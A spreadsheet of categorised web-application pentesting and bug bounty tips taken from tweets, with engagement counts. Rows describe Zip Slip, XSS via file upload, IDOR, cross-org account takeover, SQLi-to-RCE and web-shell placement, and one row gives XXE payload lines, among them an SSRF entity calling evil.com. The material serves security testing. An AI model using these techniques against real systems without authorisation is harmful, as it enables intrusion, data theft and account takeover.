| A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 | # | Category | Tweet | Subtweet | Likes | Retweets | ||||||||||||||||||||
2 | 26 | Path Manipulation | App allows uploading .zip/rar archives? There's a good chance it's vulnerable to Zip Slip. Put the malicious file inside a zip, edit zip using HexEditor, use directory traversal to change final dest. * Try both 1st&2nd occurrences separately | https://pbs.twimg.com/media/E7Ri4pJX0AE4gba?format=jpg&name=large | 216 | 67 | Source: | https://twitter.com/InonShkedy | ||||||||||||||||||
3 | 8 | IDK | White-box Pentst? Learn the dangerous functions of the tested language. Java: https://stackoverflow.com/a/4351516 .NET: https://stackoverflow.com/a/20903746 PHP: https://stackoverflow.com/a/3115645 Ruby: https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html (Or simply Google: [language] + security best practices) | 191 | 73 | https://twitter.com/traceableai | ||||||||||||||||||||
4 | 28 | File Upload | Picture upload feature? [1] Upload an image and check the URL [2] If the file isn't stored on CDN --> [3] Upload an HTML file with script tags [4] If the upload is completed successfully, it might be an XSS | 178 | 44 | |||||||||||||||||||||
5 | 13 | Deatiled Errors | How to find detailed errors in APIs? 1. Send a string instead of a number (age=ddd) 2. Remove necessary params (e.g, send a PM and remove "receiver_name" param) 3. Break JSON structure (remove '}') 4. Remove necessary headers/cookies | 145 | 39 | |||||||||||||||||||||
6 | 29 | Recon | Before a pentest, I always: 1. Use the app as a regular user to understand the BL 2. Create 2 users 3. Map all features allowing interaction between users (Inbox,invites,co-riders); these are usually a good place to find AuthZ issues | 131 | 15 | |||||||||||||||||||||
7 | 25 | CSRF | API with JWT in AuthZ header? 1. Copy JWT b64 value 2. Add new cookies - "auth_token", "jwt_token", "jwt", paste b64 as value 3. Duplicate previous API call, add cookies, remove header. 4. Works? AuthN supports cookies 5. API is 90% vulnerable to CSRF | 128 | 43 | |||||||||||||||||||||
8 | 30 | IDK | Best bug bounty tip I've received: Always focus on the most niche features that are hidden from the main dashboard. They are less likely to be covered in a pentest, and developers usually invest less time in securing them. [Examples in sub-tweet] | - Features that were exposed temporarily, such as "create Christmas greeting card" or "black Friday lottery" - Dashboards that are exposed to a limited set of users (Uber: Uber-eats drivers | FB: app developers | Airline: portal for gold members) - Old versions of the API | 100 | 20 | ||||||||||||||||||||
9 | 31 | Mental Health | Bug bounty hunting is a stressful job. If you find yourself getting overwhelmed after not finding vulns, remind yourself that some apps are just more secure than others. Apply mindfulness to your daily routine and meditate between RCEs đ§ââď¸ | 93 | 17 | |||||||||||||||||||||
10 | 11 | GraphQL | Recently learned: Grafana dashboards tend to use ElasticSearch API. In 30% of the times I've tested, they were vulnerable to a simple attack: If GraphQL query to Elastic contains a "filter"/"filter_id", remove it, and get access to other users' info. | Also relevant for Kibana | 90 | 25 | ||||||||||||||||||||
11 | 27 | Deatiled Errors | Find detailed errors: [1] Send array instead of primitive (age=[21] instead of age=21) [2] Send a Unicode char in HTTP method (Gâď¸T) [3] Send long Unicode string (age=âď¸x100) [4] If the API receives a URL, remove semicolon (http// instead of http://) | 88 | 28 | |||||||||||||||||||||
12 | 10 | XXE | Found XXE? Leverage it for: * DoS: XML Bomb * LFI: <!ENTITY xxe SYSTEM "file://path"> ** Try 2 slashes (Windows) and 3 (Linux) in path * SSRF: <!ENTITY xxe SYSTEM "http://evil.com"> ** Try different protocols [ssh,ftp,etc] | 87 | 28 | |||||||||||||||||||||
13 | 18 | Recon | Before a pentest, I always: 1. Use Burp to catch browser traffic 2. Use the target app legitimately, trying to use all buttons, views, dashboards, etc 3. Use Burp Tree View to understand better the app, including... [in sub tweet] | - Which EPs contain IDs - Does the app have sub APIs? - With which external services does the client-app communicates? | 80 | 13 | ||||||||||||||||||||
14 | 24 | AuthZ | Where I usually find IDOR (BOLA) in apps, is in features that allow extracting data as files. * "download_report/org_id=11" * "my_activity_as_pdf?user_id=22" These are often developed by different teams that don't fully understand the Authz mechanism | 78 | 21 | |||||||||||||||||||||
15 | 5 | Injection | SQLi --> RCE [1/2] Look for tables containing records that look like file paths/URLs. Internal systems might use SQL as part of scheduled jobs/updates mechanisms. Change the value to a path/URL of a malicious file | https://pbs.twimg.com/media/E5lODzjXMAI92Em?format=jpg&name=large | 61 | 12 | ||||||||||||||||||||
16 | 19 | AuthZ | B2B apps often have a "manage your organization" feature - fertile ground for vulns! [1] Create 2 users belong to different orgs [2] Login as user2 from org2 [3] Add user1 from org1 to your org [3] Find "get/export org users" API [4] leak user1 info | https://pbs.twimg.com/media/E6thB1aXsBoL7yJ?format=jpg&name=medium | 60 | 20 | ||||||||||||||||||||
17 | 20 | AuthZ | B2B apps often have an "invite user to your org" feature. 1. Invite an existing user to your org 2.Learn how the API call "accept_invite" looks using a dummy user 3. Accept the invite on behalf of the victim 4. Once victim in your org - game over | https://pbs.twimg.com/media/E6y2oG0WYAMd-Pr?format=jpg&name=medium | 46 | 21 | ||||||||||||||||||||
18 | 23 | AuthZ | API allows sending a private message? Try to change the "receiver_id" to an array instead of a single string/int. Might be used as a way to spam the system. | 42 | 9 | |||||||||||||||||||||
19 | 16 | AuthN | -- Protection for AuthN EPs -- 1. Rate limiting - require captcha/block IP addresses that accessed too many times 2. Account lockout - Many failed attempts to authenticate as user X? Block access to user X for some time. 3. Captcha always recommended | 41 | 15 | |||||||||||||||||||||
20 | 1 | Recon | Targeting a specific company and looking to expand your attack surface? Use Yandex/Google's "Search by photo" feature to search their logo and find more domains/sub-domains. | 39 | 11 | |||||||||||||||||||||
21 | 2 | Recon | Testing a web app that requires AuthN but you don't have a user? <part 1/2> [1] use Google "site:[host]" to find sub-pages; some of them might not enforce AuthN [2] access /home, /default and use DirButser to find more sub-pages | 39 | 11 | |||||||||||||||||||||
22 | 21 | AuthZ | B2B apps often provide an "impersonate user" feature to org admins. [1] Create an org admin user [2] Learn the API call to "impersonate_user" [3] Try to delegate to a user from a different org [4] Might lead to a full account takeover | https://pbs.twimg.com/media/E631R3BWYAAdxUS?format=jpg&name=medium | 38 | 10 | ||||||||||||||||||||
23 | 3 | Recon | -2nd part- [3] download JS and look for strings like "create_user"/"register"; you might find AuthN API EPs and use them to register directly. [4] use http://bugmenot.com or http://login2.me to find credentials | 29 | 8 | |||||||||||||||||||||
24 | 4 | Path Manipulation | File Upload --> RCE [1] Windows: Malicious file to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp [2] IIS: web-shell to C:\inetpub\wwwroot[3] Apache: web-shell to /var/www/html/ | * Keep in mind that in many cases the translation of [physical path] --> [virtual directory] isn't straightforward; The test thing you can do is to to find an "arbitrary file download" vuln, scan the server and find the physical location of the virtual directory. * | 27 | 13 | ||||||||||||||||||||
25 | 9 | XXE | My favorite XXE --> RCE finding: [1]XML Parser supports "gopher://" - SSRF on steroids! [2]Java debugger running locally and supports "Telnet Debugging" 𤨠[4]Read debugger doc [5]Malicious payload uses gopher to call debugger and run raw Java code đ¤ | 24 | 5 | |||||||||||||||||||||
26 | 14 | Injection | Found a SQLI? DB doesn't have interesting data? Find tables that store website content, and leverage it to cause stored XSS. | https://pbs.twimg.com/media/E6Q7RNdWYAAfPyY?format=png&name=small | 21 | 3 | ||||||||||||||||||||
27 | 7 | Injection | SQLi --> SSRF Use functions to trigger HTTP calls Oracle: UTL_HTTP.request MSSQL: master..xp_dirtree More info: | https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/ | 18 | 4 | ||||||||||||||||||||
28 | 22 | AuthZ | App provides "impersonate user" feature? Check if the app changes your auth_token after impersonation; If it does - make sure the impersonation token follows best practices (https://auth0.com/docs/best-practices/token-best-practices) It often doesn't! | 16 | 3 | |||||||||||||||||||||
29 | 6 | Injection | SQLi --> RCE [2/2] Always look for customized stored producers that were written by DBAs. The producers might use dangerous PLSQL/T-SQL funcs, that your SQL payload can't access directly | 15 | 3 | |||||||||||||||||||||
30 | 12 | AuthN | Common misconception: AuthN EPs == Login EPs. That's wrong! * Credentials Recovery * Login using magic links/1 time code * Admin "View as..." All should be considered as AuthN EPs as well, and require additional protection (rate limiting, etc) | 11 | 1 | |||||||||||||||||||||
31 | 15 | IDK | What's your funniest pentest story? I once found a stored XSS in a forum, left a silly "EVIL" alert that impacted all users; they had no "remove thread" feature; had to find a SQLi to remove it đ | |||||||||||||||||||||||
32 | 17 | Injection | Testing for SQLi? always remember the DBs are different. Especially concatenation & comments. MSSQL: abc' + 'def -- MySQL: 'abc' || 'def' # Oracle: abc' || 'def' -- * keep in mind that /*comments*/ format usually won't work inside an injection | |||||||||||||||||||||||
33 | ||||||||||||||||||||||||||
34 | Total | 2132 | 582 | |||||||||||||||||||||||
35 | ||||||||||||||||||||||||||
36 | ||||||||||||||||||||||||||
37 | ||||||||||||||||||||||||||
38 | ||||||||||||||||||||||||||
39 | ||||||||||||||||||||||||||
40 | ||||||||||||||||||||||||||
41 | ||||||||||||||||||||||||||
42 | ||||||||||||||||||||||||||
43 | ||||||||||||||||||||||||||
44 | ||||||||||||||||||||||||||
45 | ||||||||||||||||||||||||||
46 | ||||||||||||||||||||||||||
47 | ||||||||||||||||||||||||||
48 | ||||||||||||||||||||||||||
49 | ||||||||||||||||||||||||||
50 | ||||||||||||||||||||||||||
51 | ||||||||||||||||||||||||||
52 | ||||||||||||||||||||||||||
53 | ||||||||||||||||||||||||||
54 | ||||||||||||||||||||||||||
55 | ||||||||||||||||||||||||||
56 | ||||||||||||||||||||||||||
57 | ||||||||||||||||||||||||||
58 | ||||||||||||||||||||||||||
59 | ||||||||||||||||||||||||||
60 | ||||||||||||||||||||||||||
61 | ||||||||||||||||||||||||||
62 | ||||||||||||||||||||||||||
63 | ||||||||||||||||||||||||||
64 | ||||||||||||||||||||||||||
65 | ||||||||||||||||||||||||||
66 | ||||||||||||||||||||||||||
67 | ||||||||||||||||||||||||||
68 | ||||||||||||||||||||||||||
69 | ||||||||||||||||||||||||||
70 | ||||||||||||||||||||||||||
71 | ||||||||||||||||||||||||||
72 | ||||||||||||||||||||||||||
73 | ||||||||||||||||||||||||||
74 | ||||||||||||||||||||||||||
75 | ||||||||||||||||||||||||||
76 | ||||||||||||||||||||||||||
77 | ||||||||||||||||||||||||||
78 | ||||||||||||||||||||||||||
79 | ||||||||||||||||||||||||||
80 | ||||||||||||||||||||||||||
81 | ||||||||||||||||||||||||||
82 | ||||||||||||||||||||||||||
83 | ||||||||||||||||||||||||||
84 | ||||||||||||||||||||||||||
85 | ||||||||||||||||||||||||||
86 | ||||||||||||||||||||||||||
87 | ||||||||||||||||||||||||||
88 | ||||||||||||||||||||||||||
89 | ||||||||||||||||||||||||||
90 | ||||||||||||||||||||||||||
91 | ||||||||||||||||||||||||||
92 | ||||||||||||||||||||||||||
93 | ||||||||||||||||||||||||||
94 | ||||||||||||||||||||||||||
95 | ||||||||||||||||||||||||||
96 | ||||||||||||||||||||||||||
97 | ||||||||||||||||||||||||||
98 | ||||||||||||||||||||||||||
99 | ||||||||||||||||||||||||||
100 |